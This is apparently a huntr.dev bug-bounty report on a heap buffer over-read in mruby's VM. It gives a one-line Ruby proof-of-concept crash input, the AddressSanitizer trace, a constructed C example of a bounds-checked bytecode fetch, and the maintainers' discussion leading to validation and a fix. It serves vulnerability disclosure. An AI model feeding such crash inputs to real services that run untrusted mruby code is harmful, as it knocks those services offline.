Heap-based Buffer Overflow in mruby/mruby

Valid

Reported on

Sep 26th 2021


Description

Heap buffer overflow in mrb_vm_exec

Proof of Concept

# poc.rb
1.times{{}until%  ;break}

Result

./mruby poc.rb
=================================================================
==1451==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6020000023d9 at pc 0x55b2fc3f1046 bp 0x7ffc900b52f0 sp 0x7ffc900b52e0
READ of size 1 at 0x6020000023d9 thread T0
    #0 0x55b2fc3f1045 in mrb_vm_exec /root/master/asanruby/src/vm.c:1357
    #1 0x55b2fc3e8182 in mrb_vm_run /root/master/asanruby/src/vm.c:1032
    #2 0x55b2fc42949c in mrb_top_run /root/master/asanruby/src/vm.c:2969
    #3 0x55b2fc455e2f in mrb_load_exec mrbgems/mruby-compiler/core/parse.y:6896
    #4 0x55b2fc45611d in mrb_load_detect_file_cxt mrbgems/mruby-compiler/core/parse.y:6939
    #5 0x55b2fc354092 in main /root/master/asanruby/mrbgems/mruby-bin-mruby/tools/mruby/mruby.c:347
    #6 0x7f847dd860b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2)
    #7 0x55b2fc35142d in _start (/root/master/asanruby/bin/mruby+0xbd42d)

0x6020000023d9 is located 0 bytes to the right of 9-byte region [0x6020000023d0,0x6020000023d9)
allocated by thread T0 here:
    #0 0x7f847e1adffe in __interceptor_realloc (/lib/x86_64-linux-gnu/libasan.so.5+0x10dffe)
    #1 0x55b2fc3ddf2c in mrb_default_allocf /root/master/asanruby/src/state.c:68
    #2 0x55b2fc3d3e72 in mrb_realloc_simple /root/master/asanruby/src/gc.c:226
    #3 0x55b2fc462359 in codegen_realloc /root/master/asanruby/mrbgems/mruby-compiler/core/codegen.c:164
    #4 0x55b2fc48df9b in scope_finish /root/master/asanruby/mrbgems/mruby-compiler/core/codegen.c:3629
    #5 0x55b2fc47e0a3 in lambda_body /root/master/asanruby/mrbgems/mruby-compiler/core/codegen.c:1449
    #6 0x55b2fc4827f5 in codegen /root/master/asanruby/mrbgems/mruby-compiler/core/codegen.c:2145
    #7 0x55b2fc47ef85 in gen_call /root/master/asanruby/mrbgems/mruby-compiler/core/codegen.c:1606
    #8 0x55b2fc484267 in codegen /root/master/asanruby/mrbgems/mruby-compiler/core/codegen.c:2382
    #9 0x55b2fc481719 in codegen /root/master/asanruby/mrbgems/mruby-compiler/core/codegen.c:2010
    #10 0x55b2fc47e1d1 in scope_body /root/master/asanruby/mrbgems/mruby-compiler/core/codegen.c:1458
    #11 0x55b2fc484233 in codegen /root/master/asanruby/mrbgems/mruby-compiler/core/codegen.c:2377
    #12 0x55b2fc48f58f in generate_code /root/master/asanruby/mrbgems/mruby-compiler/core/codegen.c:3782
    #13 0x55b2fc48f967 in mrb_generate_code /root/master/asanruby/mrbgems/mruby-compiler/core/codegen.c:3805
    #14 0x55b2fc45594a in mrb_load_exec mrbgems/mruby-compiler/core/parse.y:6871
    #15 0x55b2fc45611d in mrb_load_detect_file_cxt mrbgems/mruby-compiler/core/parse.y:6939
    #16 0x55b2fc354092 in main /root/master/asanruby/mrbgems/mruby-bin-mruby/tools/mruby/mruby.c:347
    #17 0x7f847dd860b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2)

SUMMARY: AddressSanitizer: heap-buffer-overflow /root/master/asanruby/src/vm.c:1357 in mrb_vm_exec
Shadow bytes around the buggy address:
  0x0c047fff8420: fa fa fd fd fa fa fd fd fa fa fd fd fa fa 00 00
  0x0c047fff8430: fa fa 00 00 fa fa 00 00 fa fa 00 00 fa fa 00 00
  0x0c047fff8440: fa fa fd fd fa fa 00 00 fa fa fd fd fa fa 00 fa
  0x0c047fff8450: fa fa 00 fa fa fa 07 fa fa fa fd fd fa fa 00 fa
  0x0c047fff8460: fa fa fd fd fa fa fd fd fa fa 00 00 fa fa fd fd
=>0x0c047fff8470: fa fa 04 fa fa fa 00 00 fa fa 00[01]fa fa 00 fa
  0x0c047fff8480: fa fa 02 fa fa fa 00 04 fa fa 04 fa fa fa 00 fa
  0x0c047fff8490: fa fa 00 fa fa fa 02 fa fa fa fa fa fa fa fa fa
  0x0c047fff84a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c047fff84b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c047fff84c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
  Shadow gap:              cc
==1451==ABORTING
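The report above records a READ of size 1 at an address 0 bytes to the right of a 9-byte heap region: the VM's dispatch loop read one byte just past the end of a buffer the code generator had produced. The toy bytecode loop below is an added illustration of that class of over-read and of the bounds-checked fetch that turns it into a clean error; it is constructed example code, not mruby's VM, its opcodes are invented, and it does not reproduce the actual root cause in mruby, which the report does not identify.

```c
#include <stddef.h>
#include <stdint.h>
/* Toy ISA invented for this illustration; not mruby's opcodes. */
enum { OP_PUSH = 0x01, OP_ADD = 0x02, OP_RET = 0x03 };
enum { VM_OK = 0, VM_TRUNCATED = -1, VM_BAD_OPCODE = -2, VM_STACK = -3 };

/* Constructed sample programs: a complete one, and a 9-byte one whose
 * final PUSH has no operand, mirroring the 9-byte region in the report. */
static const uint8_t PROG_OK[]  = { OP_PUSH, 2, OP_PUSH, 3, OP_ADD, OP_RET };
static const uint8_t PROG_CUT[] = { OP_PUSH, 2, OP_PUSH, 3, OP_ADD, OP_PUSH, 4, OP_ADD, OP_PUSH };

/* Fetch one byte, refusing to read at or past the end of the buffer.
 * Without this check a trailing PUSH reads code[len]: a READ of size 1
 * located 0 bytes to the right of the region, the shape ASan printed. */
static int fetch(const uint8_t *code, size_t len, size_t *pc, uint8_t *out)
{
    if (*pc >= len) return 0;
    *out = code[(*pc)++];
    return 1;
}

/* Executes exactly len bytes of code. On VM_TRUNCATED, *fail_pc is the
 * offset the VM tried to read, to compare with the buffer length. */
static int run(const uint8_t *code, size_t len, int *result, size_t *fail_pc)
{
    int stack[16], sp = 0;
    size_t pc = 0;
    uint8_t op, imm;
    for (;;) {
        if (!fetch(code, len, &pc, &op)) { *fail_pc = pc; return VM_TRUNCATED; }
        switch (op) {
        case OP_PUSH:
            if (!fetch(code, len, &pc, &imm)) { *fail_pc = pc; return VM_TRUNCATED; }
            if (sp >= 16) return VM_STACK;
            stack[sp++] = imm;
            break;
        case OP_ADD:
            if (sp < 2) return VM_STACK;
            sp--; stack[sp - 1] += stack[sp];
            break;
        case OP_RET:
            if (sp < 1) return VM_STACK;
            *result = stack[sp - 1];
            return VM_OK;
        default:
            return VM_BAD_OPCODE;
        }
    }
}
```

Running PROG_CUT reports the failing offset 9, equal to the buffer length, which is the same relation between faulting address and region end that the sanitizer output above shows.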
We have contacted a member of the mruby team and are waiting to hear back a year ago

Although I appreciate the report, I am not sure if this is a vulnerability. It's absolutely OK for me to mark this report valid to show appreciation, but is it OK for huntr.dev policy?


What do you think, @admin?

Jamie Slome
a year ago

Admin


@matz - thanks for the question.

Please only mark reports as valid if they are legitimate security issues.

Otherwise, I would recommend marking it as invalid.

Cheers! 🎊


OK, since this is found before the release, I mark this as invalid. But the bug will be fixed soon. Thank you @wiz123!


In some cases, mruby is used to run untrusted code (e.g. mruby-engine). So a mere crash can be a security vulnerability. So this issue should be considered valid. Sorry for the confusion @wiz123.

Yukihiro "Matz" Matsumoto validated this vulnerability a year ago
felling good man has been awarded the disclosure bounty
The fix bounty is now up for grabs
Yukihiro "Matz" Matsumoto marked this as fixed with commit 368e8c a year ago
Yukihiro "Matz" Matsumoto has been awarded the fix bounty
This vulnerability will not receive a CVE